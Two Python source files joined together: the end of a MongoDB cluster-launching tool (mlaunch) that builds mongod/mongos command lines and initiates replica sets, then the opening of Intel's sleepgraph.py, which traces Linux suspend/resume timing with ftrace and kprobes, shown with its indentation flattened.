print "creating cluster without auth for setup, will enable auth at the end..."
for port in ports:
command_str = self.startup_info[str(port)]
if overrideAuth:
# this is to set up sharded clusters without auth first, then relaunch with auth
command_str = re.sub(r'--keyFile \S+', '', command_str)
try:
ret = subprocess.check_output([command_str], stderr=subprocess.STDOUT, shell=True)
binary = command_str.split()[0]
if '--configsvr' in command_str:
binary = 'config server'
if self.args['verbose']:
print "launching: %s" % command_str
else:
print "launching: %s on port %s" % (binary, port)
except subprocess.CalledProcessError, e:
print e.output
raise SystemExit("can't start process, return code %i. tried to launch: %s"% (e.returncode, command_str))
if wait:
self.wait_for(ports)
def _initiate_replset(self, port, name, maxwait=30):
# initiate replica set
if not self.args['replicaset'] and name != 'configRepl':
if self.args['verbose']:
print 'Skipping replica set initialization for %s' % name
return
con = MongoConnection('localhost:%i'%port)
try:
rs_status = con['admin'].command({'replSetGetStatus': 1})
except OperationFailure, e:
# not initiated yet
for i in range(maxwait):
try:
con['admin'].command({'replSetInitiate':self.config_docs[name]})
break
except OperationFailure, e:
print e.message, " - will retry"
time.sleep(1)
if self.args['verbose']:
print "initializing replica set '%s' with configuration: %s" % (name, self.config_docs[name])
print "replica set '%s' initialized." % name
def _add_user(self, port, name, password, database, roles):
con = MongoConnection('localhost:%i'%port)
try:
con[database].add_user(name, password=password, roles=roles)
except OperationFailure as e:
pass
except TypeError as e:
if pymongo_version < (2, 5, 0):
con[database].add_user(name, password=password)
warnings.warn('Your pymongo version is too old to support auth roles. Added a legacy user with root access. To support roles, you need to upgrade to pymongo >= 2.5.0')
else:
raise e
def _get_processes(self):
all_ports = self.get_tagged('running')
process_dict = {}
for p in psutil.process_iter():
# deal with zombie process errors in OSX
try:
name = p.name()
except psutil.NoSuchProcess:
continue
# skip all but mongod / mongos
if name not in ['mongos', 'mongod']:
continue
port = None
for possible_port in self.startup_info:
# compare ports based on command line argument
startup = self.startup_info[possible_port].split()
try:
p_port = p.cmdline()[p.cmdline().index('--port')+1]
startup_port = startup[startup.index('--port')+1]
except ValueError:
continue
if str(p_port) == str(startup_port):
port = int(possible_port)
break
# only consider processes belonging to this environment
if port in all_ports:
process_dict[port] = p
return process_dict
def _wait_for_primary(self):
hosts = [x['host'] for x in self.config_docs['replset']['members']]
rs_name = self.config_docs['replset']['_id']
mrsc = Connection( hosts, replicaSet=rs_name )
if mrsc.is_primary:
# update cluster tags now that we have a primary
self.cluster_tags['primary'].append( mrsc.primary[1] )
self.cluster_tags['secondary'].extend( map(itemgetter(1), mrsc.secondaries) )
self.cluster_tags['arbiter'].extend( map(itemgetter(1), mrsc.arbiters) )
# secondaries in cluster_tree (order is now important)
self.cluster_tree.setdefault( 'secondary', [] )
for i, secondary in enumerate(sorted(map(itemgetter(1), mrsc.secondaries))):
if len(self.cluster_tree['secondary']) <= i:
self.cluster_tree['secondary'].append([])
self.cluster_tree['secondary'][i].append(secondary)
return True
return False
# --- below are command line constructor methods, that build the command line strings to be called
def _construct_cmdlines(self):
""" This is the top-level _construct_* method. From here, it will branch out to
the different cases: _construct_sharded, _construct_replicaset, _construct_single. These
can themselves call each other (for example sharded needs to create the shards with
either replicaset or single node). At the lowest level, the construct_mongod, _mongos, _config
will create the actual command line strings and store them in self.startup_info.
"""
if self.args['sharded']:
# construct startup string for sharded environments
self._construct_sharded()
elif self.args['single']:
# construct startup string for single node environment
self._construct_single(self.dir, self.args['port'])
elif self.args['replicaset']:
# construct startup strings for a non-sharded replica set
self._construct_replset(self.dir, self.args['port'], self.args['name'], range(self.args['nodes']), self.args['arbiter'])
# discover current setup
self.discover()
def _construct_sharded(self):
""" construct command line strings for a sharded cluster. """
num_mongos = self.args['mongos'] if self.args['mongos'] > 0 else 1
shard_names = self._get_shard_names(self.args)
# create shards as stand-alones or replica sets
nextport = self.args['port'] + num_mongos
for shard in shard_names:
if self.args['single']:
self.shard_connection_str.append( self._construct_single(self.dir, nextport, name=shard, extra='--shardsvr') )
nextport += 1
elif self.args['replicaset']:
self.shard_connection_str.append( self._construct_replset(self.dir, nextport, shard, num_nodes=range(self.args['nodes']), arbiter=self.args['arbiter'], extra='--shardsvr') )
nextport += self.args['nodes']
if self.args['arbiter']:
nextport += 1
# start up config server(s)
config_string = []
# SCCC config servers (MongoDB <3.3.0)
if not self.args['csrs'] and self.args['config'] >= 3:
config_names = ['config1', 'config2', 'config3']
else:
config_names = ['config']
# CSRS config servers (MongoDB >=3.1.0)
if self.args['csrs']:
config_string.append(self._construct_config(self.dir, nextport, "configRepl", True))
else:
for name in config_names:
self._construct_config(self.dir, nextport, name)
config_string.append('%s:%i'%(self.args['hostname'], nextport))
nextport += 1
# multiple mongos use <datadir>/mongos/ as subdir for log files
if num_mongos > 1:
mongosdir = os.path.join(self.dir, 'mongos')
if not os.path.exists(mongosdir):
if self.args['verbose']:
print "creating directory: %s" % mongosdir
os.makedirs(mongosdir)
# start up mongos, but put them to the front of the port range
nextport = self.args['port']
for i in range(num_mongos):
if num_mongos > 1:
mongos_logfile = 'mongos/mongos_%i.log' % nextport
else:
mongos_logfile = 'mongos.log'
self._construct_mongos(os.path.join(self.dir, mongos_logfile), nextport, ','.join(config_string))
nextport += 1
def _construct_replset(self, basedir, portstart, name, num_nodes, arbiter, extra=''):
""" construct command line strings for a replicaset, either for sharded cluster or by itself. """
self.config_docs[name] = {'_id':name, 'members':[]}
# Construct individual replica set nodes
for i in num_nodes:
datapath = self._create_paths(basedir, '%s/rs%i'%(name, i+1))
self._construct_mongod(os.path.join(datapath, 'db'), os.path.join(datapath, 'mongod.log'), portstart+i, replset=name, extra=extra)
host = '%s:%i'%(self.args['hostname'], portstart+i)
member_config = {
'_id': len(self.config_docs[name]['members']),
'host': host,
}
# First node gets increased priority.
if i == 0 and self.args['priority']:
member_config['priority'] = 10
self.config_docs[name]['members'].append(member_config)
# launch arbiter if True
if arbiter:
datapath = self._create_paths(basedir, '%s/arb'%(name))
self._construct_mongod(os.path.join(datapath, 'db'), os.path.join(datapath, 'mongod.log'), portstart+self.args['nodes'], replset=name)
host = '%s:%i'%(self.args['hostname'], portstart+self.args['nodes'])
self.config_docs[name]['members'].append({'_id':len(self.config_docs[name]['members']), 'host':host, 'arbiterOnly': True})
return name + '/' + ','.join([c['host'] for c in self.config_docs[name]['members']])
def _construct_config(self, basedir, port, name=None, isReplSet=False):
""" construct command line strings for a config server """
if isReplSet:
return self._construct_replset(basedir=basedir, portstart=port, name=name, num_nodes=range(self.args['config']), arbiter=False, extra='--configsvr')
else:
datapath = self._create_paths(basedir, name)
self._construct_mongod(os.path.join(datapath, 'db'), os.path.join(datapath, 'mongod.log'), port, replset=None, extra='--configsvr')
def _construct_single(self, basedir, port, name=None, extra=''):
""" construct command line strings for a single node, either for shards or as a stand-alone. """
datapath = self._create_paths(basedir, name)
self._construct_mongod(os.path.join(datapath, 'db'), os.path.join(datapath, 'mongod.log'), port, replset=None, extra=extra)
host = '%s:%i'%(self.args['hostname'], port)
return host
def _construct_mongod(self, dbpath, logpath, port, replset=None, extra=''):
""" construct command line strings for mongod process. """
rs_param = ''
if replset:
rs_param = '--replSet %s'%replset
auth_param = ''
if self.args['auth']:
key_path = os.path.abspath(os.path.join(self.dir, 'keyfile'))
auth_param = '--keyFile %s'%key_path
if self.unknown_args:
config = '--configsvr' in extra
extra = self._filter_valid_arguments(self.unknown_args, "mongod", config=config) + ' ' + extra
path = self.args['binarypath'] or ''
command_str = "%s %s --dbpath %s --logpath %s --port %i --logappend --fork %s %s"%(os.path.join(path, 'mongod'), rs_param, dbpath, logpath, port, auth_param, extra)
# store parameters in startup_info
self.startup_info[str(port)] = command_str
def _construct_mongos(self, logpath, port, configdb):
""" construct command line strings for a mongos process. """
extra = ''
out = subprocess.PIPE
if self.args['verbose']:
out = None
auth_param = ''
if self.args['auth']:
key_path = os.path.abspath(os.path.join(self.dir, 'keyfile'))
auth_param = '--keyFile %s'%key_path
if self.unknown_args:
extra = self._filter_valid_arguments(self.unknown_args, "mongos") + extra
path = self.args['binarypath'] or ''
command_str = "%s --logpath %s --port %i --configdb %s --logappend %s %s --fork"%(os.path.join(path, 'mongos'), logpath, port, configdb, auth_param, extra)
# store parameters in startup_info
self.startup_info[str(port)] = command_str
def _read_key_file(self):
with open(os.path.join(self.dir, 'keyfile'), 'r') as f:
return ''.join(f.readlines())
def main():
tool = MLaunchTool()
tool.run()
if __name__ == '__main__':
sys.exit(main())
|
sleepgraph.py
|
#!/usr/bin/env python3
# SPDX-License-Identifier: GPL-2.0-only
#
# Tool for analyzing suspend/resume timing
# Copyright (c) 2013, Intel Corporation.
#
# This program is free software; you can redistribute it and/or modify it
# under the terms and conditions of the GNU General Public License,
# version 2, as published by the Free Software Foundation.
#
# This program is distributed in the hope it will be useful, but WITHOUT
# ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or
# FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for
# more details.
#
# Authors:
# Todd Brandt <todd.e.brandt@linux.intel.com>
#
# Links:
# Home Page
# https://01.org/pm-graph
# Source repo
# git@github.com:intel/pm-graph
#
# Description:
# This tool is designed to assist kernel and OS developers in optimizing
# their linux stack's suspend/resume time. Using a kernel image built
# with a few extra options enabled, the tool will execute a suspend and
# will capture dmesg and ftrace data until resume is complete. This data
# is transformed into a device timeline and a callgraph to give a quick
# and detailed view of which devices and callbacks are taking the most
# time in suspend/resume. The output is a single html file which can be
# viewed in firefox or chrome.
#
# The following kernel build options are required:
# CONFIG_DEVMEM=y
# CONFIG_PM_DEBUG=y
# CONFIG_PM_SLEEP_DEBUG=y
# CONFIG_FTRACE=y
# CONFIG_FUNCTION_TRACER=y
# CONFIG_FUNCTION_GRAPH_TRACER=y
# CONFIG_KPROBES=y
# CONFIG_KPROBES_ON_FTRACE=y
#
# For kernel versions older than 3.15:
# The following additional kernel parameters are required:
# (e.g. in file /etc/default/grub)
# GRUB_CMDLINE_LINUX_DEFAULT="... initcall_debug log_buf_len=16M ..."
#
# ----------------- LIBRARIES --------------------
import sys
import time
import os
import string
import re
import platform
import signal
import codecs
from datetime import datetime, timedelta
import struct
import configparser
import gzip
from threading import Thread
from subprocess import call, Popen, PIPE
import base64
def pprint(msg):
print(msg)
sys.stdout.flush()
def ascii(text):
return text.decode('ascii', 'ignore')
# ----------------- CLASSES --------------------
# Class: SystemValues
# Description:
# A global, single-instance container used to
# store system values and test parameters
class SystemValues:
title = 'SleepGraph'
version = '5.8'
ansi = False
rs = 0
display = ''
gzip = False
sync = False
wifi = False
verbose = False
testlog = True
dmesglog = True
ftracelog = False
acpidebug = True
tstat = True
mindevlen = 0.0001
mincglen = 0.0
cgphase = ''
cgtest = -1
cgskip = ''
maxfail = 0
multitest = {'run': False, 'count': 1000000, 'delay': 0}
max_graph_depth = 0
callloopmaxgap = 0.0001
callloopmaxlen = 0.005
bufsize = 0
cpucount = 0
memtotal = 204800
memfree = 204800
srgap = 0
cgexp = False
testdir = ''
outdir = ''
tpath = '/sys/kernel/debug/tracing/'
fpdtpath = '/sys/firmware/acpi/tables/FPDT'
epath = '/sys/kernel/debug/tracing/events/power/'
pmdpath = '/sys/power/pm_debug_messages'
acpipath='/sys/module/acpi/parameters/debug_level'
traceevents = [
'suspend_resume',
'wakeup_source_activate',
'wakeup_source_deactivate',
'device_pm_callback_end',
'device_pm_callback_start'
]
logmsg = ''
testcommand = ''
mempath = '/dev/mem'
powerfile = '/sys/power/state'
mempowerfile = '/sys/power/mem_sleep'
diskpowerfile = '/sys/power/disk'
suspendmode = 'mem'
memmode = ''
diskmode = ''
hostname = 'localhost'
prefix = 'test'
teststamp = ''
sysstamp = ''
dmesgstart = 0.0
dmesgfile = ''
ftracefile = ''
htmlfile = 'output.html'
result = ''
rtcwake = True
rtcwaketime = 15
rtcpath = ''
devicefilter = []
cgfilter = []
stamp = 0
execcount = 1
x2delay = 0
skiphtml = False
usecallgraph = False
ftopfunc = 'pm_suspend'
ftop = False
usetraceevents = False
usetracemarkers = True
usekprobes = True
usedevsrc = False
useprocmon = False
notestrun = False
cgdump = False
devdump = False
mixedphaseheight = True
devprops = dict()
cfgdef = dict()
platinfo = []
predelay = 0
postdelay = 0
tmstart = 'SUSPEND START %Y%m%d-%H:%M:%S.%f'
tmend = 'RESUME COMPLETE %Y%m%d-%H:%M:%S.%f'
tracefuncs = {
'sys_sync': {},
'ksys_sync': {},
'__pm_notifier_call_chain': {},
'pm_prepare_console': {},
'pm_notifier_call_chain': {},
'freeze_processes': {},
'freeze_kernel_threads': {},
'pm_restrict_gfp_mask': {},
'acpi_suspend_begin': {},
'acpi_hibernation_begin': {},
'acpi_hibernation_enter': {},
'acpi_hibernation_leave': {},
'acpi_pm_freeze': {},
'acpi_pm_thaw': {},
'acpi_s2idle_end': {},
'acpi_s2idle_sync': {},
'acpi_s2idle_begin': {},
'acpi_s2idle_prepare': {},
'acpi_s2idle_prepare_late': {},
'acpi_s2idle_wake': {},
'acpi_s2idle_wakeup': {},
'acpi_s2idle_restore': {},
'acpi_s2idle_restore_early': {},
'hibernate_preallocate_memory': {},
'create_basic_memory_bitmaps': {},
'swsusp_write': {},
'suspend_console': {},
'acpi_pm_prepare': {},
'syscore_suspend': {},
'arch_enable_nonboot_cpus_end': {},
'syscore_resume': {},
'acpi_pm_finish': {},
'resume_console': {},
'acpi_pm_end': {},
'pm_restore_gfp_mask': {},
'thaw_processes': {},
'pm_restore_console': {},
'CPU_OFF': {
'func':'_cpu_down',
'args_x86_64': {'cpu':'%di:s32'},
'format': 'CPU_OFF[{cpu}]'
},
'CPU_ON': {
'func':'_cpu_up',
'args_x86_64': {'cpu':'%di:s32'},
'format': 'CPU_ON[{cpu}]'
},
}
dev_tracefuncs = {
# general wait/delay/sleep
'msleep': { 'args_x86_64': {'time':'%di:s32'}, 'ub': 1 },
'schedule_timeout': { 'args_x86_64': {'timeout':'%di:s32'}, 'ub': 1 },
'udelay': { 'func':'__const_udelay', 'args_x86_64': {'loops':'%di:s32'}, 'ub': 1 },
'usleep_range': { 'args_x86_64': {'min':'%di:s32', 'max':'%si:s32'}, 'ub': 1 },
'mutex_lock_slowpath': { 'func':'__mutex_lock_slowpath', 'ub': 1 },
'acpi_os_stall': {'ub': 1},
'rt_mutex_slowlock': {'ub': 1},
# ACPI
'acpi_resume_power_resources': {},
'acpi_ps_execute_method': { 'args_x86_64': {
'fullpath':'+0(+40(%di)):string',
}},
# mei_me
'mei_reset': {},
# filesystem
'ext4_sync_fs': {},
# 80211
'ath10k_bmi_read_memory': { 'args_x86_64': {'length':'%cx:s32'} },
'ath10k_bmi_write_memory': { 'args_x86_64': {'length':'%cx:s32'} },
'ath10k_bmi_fast_download': { 'args_x86_64': {'length':'%cx:s32'} },
'iwlagn_mac_start': {},
'iwlagn_alloc_bcast_station': {},
'iwl_trans_pcie_start_hw': {},
'iwl_trans_pcie_start_fw': {},
'iwl_run_init_ucode': {},
'iwl_load_ucode_wait_alive': {},
'iwl_alive_start': {},
'iwlagn_mac_stop': {},
'iwlagn_mac_suspend': {},
'iwlagn_mac_resume': {},
'iwlagn_mac_add_interface': {},
'iwlagn_mac_remove_interface': {},
'iwlagn_mac_change_interface': {},
'iwlagn_mac_config': {},
'iwlagn_configure_filter': {},
'iwlagn_mac_hw_scan': {},
'iwlagn_bss_info_changed': {},
'iwlagn_mac_channel_switch': {},
'iwlagn_mac_flush': {},
# ATA
'ata_eh_recover': { 'args_x86_64': {'port':'+36(%di):s32'} },
# i915
'i915_gem_resume': {},
'i915_restore_state': {},
'intel_opregion_setup': {},
'g4x_pre_enable_dp': {},
'vlv_pre_enable_dp': {},
'chv_pre_enable_dp': {},
'g4x_enable_dp': {},
'vlv_enable_dp': {},
'intel_hpd_init': {},
'intel_opregion_register': {},
'intel_dp_detect': {},
'intel_hdmi_detect': {},
'intel_opregion_init': {},
'intel_fbdev_set_suspend': {},
}
infocmds = [
[0, 'kparams', 'cat', '/proc/cmdline'],
[0, 'mcelog', 'mcelog'],
[0, 'pcidevices', 'lspci', '-tv'],
[0, 'usbdevices', 'lsusb', '-t'],
[1, 'interrupts', 'cat', '/proc/interrupts'],
[1, 'wakeups', 'cat', '/sys/kernel/debug/wakeup_sources'],
[2, 'gpecounts', 'sh', '-c', 'grep -v invalid /sys/firmware/acpi/interrupts/*'],
[2, 'suspendstats', 'sh', '-c', 'grep -v invalid /sys/power/suspend_stats/*'],
[2, 'cpuidle', 'sh', '-c', 'grep -v invalid /sys/devices/system/cpu/cpu*/cpuidle/state*/s2idle/*'],
[2, 'battery', 'sh', '-c', 'grep -v invalid /sys/class/power_supply/*/*'],
]
cgblacklist = []
kprobes = dict()
timeformat = '%.3f'
cmdline = '%s %s' % \
(os.path.basename(sys.argv[0]), ' '.join(sys.argv[1:]))
sudouser = ''
def __init__(self):
self.archargs = 'args_'+platform.machine()
self.hostname = platform.node()
if(self.hostname == ''):
self.hostname = 'localhost'
rtc = "rtc0"
if os.path.exists('/dev/rtc'):
rtc = os.readlink('/dev/rtc')
rtc = '/sys/class/rtc/'+rtc
if os.path.exists(rtc) and os.path.exists(rtc+'/date') and \
os.path.exists(rtc+'/time') and os.path.exists(rtc+'/wakealarm'):
self.rtcpath = rtc
if (hasattr(sys.stdout, 'isatty') and sys.stdout.isatty()):
self.ansi = True
self.testdir = datetime.now().strftime('suspend-%y%m%d-%H%M%S')
if os.getuid() == 0 and 'SUDO_USER' in os.environ and \
os.environ['SUDO_USER']:
self.sudouser = os.environ['SUDO_USER']
def resetlog(self):
self.logmsg = ''
self.platinfo = []
def vprint(self, msg):
self.logmsg += msg+'\n'
if self.verbose or msg.startswith('WARNING:'):
pprint(msg)
def signalHandler(self, signum, frame):
if not self.result:
return
signame = self.signames[signum] if signum in self.signames else 'UNKNOWN'
msg = 'Signal %s caused a tool exit, line %d' % (signame, frame.f_lineno)
self.outputResult({'error':msg})
sys.exit(3)
def signalHandlerInit(self):
capture = ['BUS', 'SYS', 'XCPU', 'XFSZ', 'PWR', 'HUP', 'INT', 'QUIT',
'ILL', 'ABRT', 'FPE', 'SEGV', 'TERM']
self.signames = dict()
for i in capture:
s = 'SIG'+i
try:
signum = getattr(signal, s)
signal.signal(signum, self.signalHandler)
except:
continue
self.signames[signum] = s
def rootCheck(self, fatal=True):
if(os.access(self.powerfile, os.W_OK)):
return True
if fatal:
msg = 'This command requires sysfs mount and root access'
pprint('ERROR: %s\n' % msg)
self.outputResult({'error':msg})
sys.exit(1)
return False
def rootUser(self, fatal=False):
if 'USER' in os.environ and os.environ['USER'] == 'root':
return True
if fatal:
msg = 'This command must be run as root'
pprint('ERROR: %s\n' % msg)
self.outputResult({'error':msg})
sys.exit(1)
return False
def usable(self, file):
return (os.path.exists(file) and os.path.getsize(file) > 0)
def getExec(self, cmd):
try:
fp = Popen(['which', cmd], stdout=PIPE, stderr=PIPE).stdout
out = ascii(fp.read()).strip()
fp.close()
except:
out = ''
if out:
return out
for path in ['/sbin', '/bin', '/usr/sbin', '/usr/bin',
'/usr/local/sbin', '/usr/local/bin']:
cmdfull = os.path.join(path, cmd)
if os.path.exists(cmdfull):
return cmdfull
return out
def setPrecision(self, num):
if num < 0 or num > 6:
return
self.timeformat = '%.{0}f'.format(num)
def setOutputFolder(self, value):
args = dict()
n = datetime.now()
args['date'] = n.strftime('%y%m%d')
args['time'] = n.strftime('%H%M%S')
args['hostname'] = args['host'] = self.hostname
args['mode'] = self.suspendmode
return value.format(**args)
def setOutputFile(self):
if self.dmesgfile != '':
m = re.match('(?P<name>.*)_dmesg\.txt.*', self.dmesgfile)
if(m):
self.htmlfile = m.group('name')+'.html'
if self.ftracefile != '':
m = re.match('(?P<name>.*)_ftrace\.txt.*', self.ftracefile)
if(m):
self.htmlfile = m.group('name')+'.html'
def systemInfo(self, info):
p = m = ''
if 'baseboard-manufacturer' in info:
m = info['baseboard-manufacturer']
elif 'system-manufacturer' in info:
m = info['system-manufacturer']
if 'system-product-name' in info:
p = info['system-product-name']
elif 'baseboard-product-name' in info:
p = info['baseboard-product-name']
if m[:5].lower() == 'intel' and 'baseboard-product-name' in info:
p = info['baseboard-product-name']
c = info['processor-version'] if 'processor-version' in info else ''
b = info['bios-version'] if 'bios-version' in info else ''
r = info['bios-release-date'] if 'bios-release-date' in info else ''
self.sysstamp = '# sysinfo | man:%s | plat:%s | cpu:%s | bios:%s | biosdate:%s | numcpu:%d | memsz:%d | memfr:%d' % \
(m, p, c, b, r, self.cpucount, self.memtotal, self.memfree)
def printSystemInfo(self, fatal=False):
self.rootCheck(True)
out = dmidecode(self.mempath, fatal)
if len(out) < 1:
return
fmt = '%-24s: %s'
for name in sorted(out):
print(fmt % (name, out[name]))
print(fmt % ('cpucount', ('%d' % self.cpucount)))
print(fmt % ('memtotal', ('%d kB' % self.memtotal)))
print(fmt % ('memfree', ('%d kB' % self.memfree)))
def cpuInfo(self):
self.cpucount = 0
fp = open('/proc/cpuinfo', 'r')
for line in fp:
if re.match('^processor[ \t]*:[ \t]*[0-9]*', line):
self.cpucount += 1
fp.close()
fp = open('/proc/meminfo', 'r')
for line in fp:
m = re.match('^MemTotal:[ \t]*(?P<sz>[0-9]*) *kB', line)
if m:
self.memtotal = int(m.group('sz'))
m = re.match('^MemFree:[ \t]*(?P<sz>[0-9]*) *kB', line)
if m:
self.memfree = int(m.group('sz'))
fp.close()
def initTestOutput(self, name):
self.prefix = self.hostname
v = open('/proc/version', 'r').read().strip()
kver = v.split()[2]
fmt = name+'-%m%d%y-%H%M%S'
testtime = datetime.now().strftime(fmt)
self.teststamp = \
'# '+testtime+' '+self.prefix+' '+self.suspendmode+' '+kver
ext = ''
if self.gzip:
ext = '.gz'
self.dmesgfile = \
self.testdir+'/'+self.prefix+'_'+self.suspendmode+'_dmesg.txt'+ext
self.ftracefile = \
self.testdir+'/'+self.prefix+'_'+self.suspendmode+'_ftrace.txt'+ext
self.htmlfile = \
self.testdir+'/'+self.prefix+'_'+self.suspendmode+'.html'
if not os.path.isdir(self.testdir):
os.makedirs(self.testdir)
self.sudoUserchown(self.testdir)
def getValueList(self, value):
out = []
for i in value.split(','):
if i.strip():
out.append(i.strip())
return out
def setDeviceFilter(self, value):
self.devicefilter = self.getValueList(value)
def setCallgraphFilter(self, value):
self.cgfilter = self.getValueList(value)
def skipKprobes(self, value):
for k in self.getValueList(value):
if k in self.tracefuncs:
del self.tracefuncs[k]
if k in self.dev_tracefuncs:
del self.dev_tracefuncs[k]
def setCallgraphBlacklist(self, file):
self.cgblacklist = self.listFromFile(file)
def rtcWakeAlarmOn(self):
call('echo 0 > '+self.rtcpath+'/wakealarm', shell=True)
nowtime = open(self.rtcpath+'/since_epoch', 'r').read().strip()
if nowtime:
nowtime = int(nowtime)
else:
# if hardware time fails, use the software time
nowtime = int(datetime.now().strftime('%s'))
alarm = nowtime + self.rtcwaketime
call('echo %d > %s/wakealarm' % (alarm, self.rtcpath), shell=True)
def rtcWakeAlarmOff(self):
call('echo 0 > %s/wakealarm' % self.rtcpath, shell=True)
def initdmesg(self):
# get the latest time stamp from the dmesg log
lines = Popen('dmesg', stdout=PIPE).stdout.readlines()
ktime = '0'
for line in reversed(lines):
line = ascii(line).replace('\r\n', '')
idx = line.find('[')
if idx > 1:
line = line[idx:]
m = re.match('[ \t]*(\[ *)(?P<ktime>[0-9\.]*)(\]) (?P<msg>.*)', line)
if(m):
ktime = m.group('ktime')
break
self.dmesgstart = float(ktime)
def getdmesg(self, testdata):
op = self.writeDatafileHeader(self.dmesgfile, testdata)
# store all new dmesg lines since initdmesg was called
fp = Popen('dmesg', stdout=PIPE).stdout
for line in fp:
line = ascii(line).replace('\r\n', '')
idx = line.find('[')
if idx > 1:
line = line[idx:]
m = re.match('[ \t]*(\[ *)(?P<ktime>[0-9\.]*)(\]) (?P<msg>.*)', line)
if(not m):
continue
ktime = float(m.group('ktime'))
if ktime > self.dmesgstart:
op.write(line)
fp.close()
op.close()
def listFromFile(self, file):
list = []
fp = open(file)
for i in fp.read().split('\n'):
i = i.strip()
if i and i[0] != '#':
list.append(i)
fp.close()
return list
def addFtraceFilterFunctions(self, file):
for i in self.listFromFile(file):
if len(i) < 2:
continue
self.tracefuncs[i] = dict()
def getFtraceFilterFunctions(self, current):
self.rootCheck(True)
if not current:
call('cat '+self.tpath+'available_filter_functions', shell=True)
return
master = self.listFromFile(self.tpath+'available_filter_functions')
for i in sorted(self.tracefuncs):
if 'func' in self.tracefuncs[i]:
i = self.tracefuncs[i]['func']
if i in master:
print(i)
else:
print(self.colorText(i))
def setFtraceFilterFunctions(self, list):
master = self.listFromFile(self.tpath+'available_filter_functions')
flist = ''
for i in list:
if i not in master:
continue
if ' [' in i:
flist += i.split(' ')[0]+'\n'
else:
flist += i+'\n'
fp = open(self.tpath+'set_graph_function', 'w')
fp.write(flist)
fp.close()
def basicKprobe(self, name):
self.kprobes[name] = {'name': name,'func': name,'args': dict(),'format': name}
def defaultKprobe(self, name, kdata):
k = kdata
for field in ['name', 'format', 'func']:
if field not in k:
k[field] = name
if self.archargs in k:
k['args'] = k[self.archargs]
else:
k['args'] = dict()
k['format'] = name
self.kprobes[name] = k
def kprobeColor(self, name):
if name not in self.kprobes or 'color' not in self.kprobes[name]:
return ''
return self.kprobes[name]['color']
def kprobeDisplayName(self, name, dataraw):
if name not in self.kprobes:
self.basicKprobe(name)
data = ''
quote=0
# first remvoe any spaces inside quotes, and the quotes
for c in dataraw:
if c == '"':
quote = (quote + 1) % 2
if quote and c == ' ':
data += '_'
elif c != '"':
data += c
fmt, args = self.kprobes[name]['format'], self.kprobes[name]['args']
arglist = dict()
# now process the args
for arg in sorted(args):
arglist[arg] = ''
m = re.match('.* '+arg+'=(?P<arg>.*) ', data);
if m:
arglist[arg] = m.group('arg')
else:
m = re.match('.* '+arg+'=(?P<arg>.*)', data);
if m:
arglist[arg] = m.group('arg')
out = fmt.format(**arglist)
out = out.replace(' ', '_').replace('"', '')
return out
def kprobeText(self, kname, kprobe):
name = fmt = func = kname
args = dict()
if 'name' in kprobe:
name = kprobe['name']
if 'format' in kprobe:
fmt = kprobe['format']
if 'func' in kprobe:
func = kprobe['func']
if self.archargs in kprobe:
args = kprobe[self.archargs]
if 'args' in kprobe:
args = kprobe['args']
if re.findall('{(?P<n>[a-z,A-Z,0-9]*)}', func):
doError('Kprobe "%s" has format info in the function name "%s"' % (name, func))
for arg in re.findall('{(?P<n>[a-z,A-Z,0-9]*)}', fmt):
if arg not in args:
doError('Kprobe "%s" is missing argument "%s"' % (name, arg))
val = 'p:%s_cal %s' % (name, func)
for i in sorted(args):
val += ' %s=%s' % (i, args[i])
val += '\nr:%s_ret %s $retval\n' % (name, func)
return val
def addKprobes(self, output=False):
if len(self.kprobes) < 1:
return
if output:
pprint(' kprobe functions in this kernel:')
# first test each kprobe
rejects = []
# sort kprobes: trace, ub-dev, custom, dev
kpl = [[], [], [], []]
linesout = len(self.kprobes)
for name in sorted(self.kprobes):
res = self.colorText('YES', 32)
if not self.testKprobe(name, self.kprobes[name]):
res = self.colorText('NO')
rejects.append(name)
else:
if name in self.tracefuncs:
kpl[0].append(name)
elif name in self.dev_tracefuncs:
if 'ub' in self.dev_tracefuncs[name]:
kpl[1].append(name)
else:
kpl[3].append(name)
else:
kpl[2].append(name)
if output:
pprint(' %s: %s' % (name, res))
kplist = kpl[0] + kpl[1] + kpl[2] + kpl[3]
# remove all failed ones from the list
for name in rejects:
self.kprobes.pop(name)
# set the kprobes all at once
self.fsetVal('', 'kprobe_events')
kprobeevents = ''
for kp in kplist:
kprobeevents += self.kprobeText(kp, self.kprobes[kp])
self.fsetVal(kprobeevents, 'kprobe_events')
if output:
check = self.fgetVal('kprobe_events')
linesack = (len(check.split('\n')) - 1) // 2
pprint(' kprobe functions enabled: %d/%d' % (linesack, linesout))
self.fsetVal('1', 'events/kprobes/enable')
def testKprobe(self, kname, kprobe):
self.fsetVal('0', 'events/kprobes/enable')
kprobeevents = self.kprobeText(kname, kprobe)
if not kprobeevents:
return False
try:
self.fsetVal(kprobeevents, 'kprobe_events')
check = self.fgetVal('kprobe_events')
except:
return False
linesout = len(kprobeevents.split('\n'))
linesack = len(check.split('\n'))
if linesack < linesout:
return False
return True
def setVal(self, val, file):
if not os.path.exists(file):
return False
try:
fp = open(file, 'wb', 0)
fp.write(val.encode())
fp.flush()
fp.close()
except:
return False
return True
def fsetVal(self, val, path):
return self.setVal(val, self.tpath+path)
def getVal(self, file):
res = ''
if not os.path.exists(file):
return res
try:
fp = open(file, 'r')
res = fp.read()
fp.close()
except:
pass
return res
def fgetVal(self, path):
return self.getVal(self.tpath+path)
def cleanupFtrace(self):
if(self.usecallgraph or self.usetraceevents or self.usedevsrc):
self.fsetVal('0', 'events/kprobes/enable')
self.fsetVal('', 'kprobe_events')
self.fsetVal('1024', 'buffer_size_kb')
def setupAllKprobes(self):
for name in self.tracefuncs:
self.defaultKprobe(name, self.tracefuncs[name])
for name in self.dev_tracefuncs:
self.defaultKprobe(name, self.dev_tracefuncs[name])
def isCallgraphFunc(self, name):
if len(self.tracefuncs) < 1 and self.suspendmode == 'command':
return True
for i in self.tracefuncs:
if 'func' in self.tracefuncs[i]:
f = self.tracefuncs[i]['func']
else:
f = i
if name == f:
return True
return False
def initFtrace(self, quiet=False):
if not quiet:
sysvals.printSystemInfo(False)
pprint('INITIALIZING FTRACE...')
# turn trace off
self.fsetVal('0', 'tracing_on')
self.cleanupFtrace()
self.testVal(self.pmdpath, 'basic', '1')
# set the trace clock to global
self.fsetVal('global', 'trace_clock')
self.fsetVal('nop', 'current_tracer')
# set trace buffer to an appropriate value
cpus = max(1, self.cpucount)
if self.bufsize > 0:
tgtsize = self.bufsize
elif self.usecallgraph or self.usedevsrc:
